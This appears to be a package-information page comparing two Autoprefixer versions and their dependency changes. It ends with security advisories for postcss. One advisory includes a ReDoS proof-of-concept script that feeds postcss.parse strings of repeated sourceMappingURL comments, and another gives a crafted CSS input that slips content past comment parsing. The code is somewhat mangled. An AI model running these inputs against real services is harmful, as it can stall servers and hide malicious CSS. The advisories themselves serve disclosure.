The Autoprefixer package saw a revision from version 1.1.20140403 to 1.1.20140410, representing a snapshot of the tool's continual effort to keep pace with the evolving landscape of web development. Both iterations serve the same core purpose: parsing CSS and automatically adding vendor prefixes to CSS rules, referencing data from the "Can I Use" website to ensure compatibility across different browsers and versions. This functionality is incredibly valuable for developers aiming to write clean, standards-compliant CSS while ensuring their designs render correctly for the broadest possible audience.
While the core dependencies on postcss and fs-extra remained consistent between versions, some notable shifts occurred in the development dependencies. The should package, utilized for writing expressive tests, was updated from version 3.2.0 to 3.3.0. Stylus, a CSS preprocessor, saw an incremental update from version 0.42.3 to 0.43.1. Browserify, a tool for bundling JavaScript modules for the browser, was bumped from version 3.38.0 to 3.39.0. These changes suggest ongoing refinements and improvements in the testing and development workflow surrounding Autoprefixer.
Although the functionality remains similar, developers should always strive to use the latest version, to benefit from the latest bug fixes, updated browser compatibility data, and potential performance enhancements within the build process itself, leading to a smoother development experience.
All the vulnerabilities related to the version 1.1.20140410 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.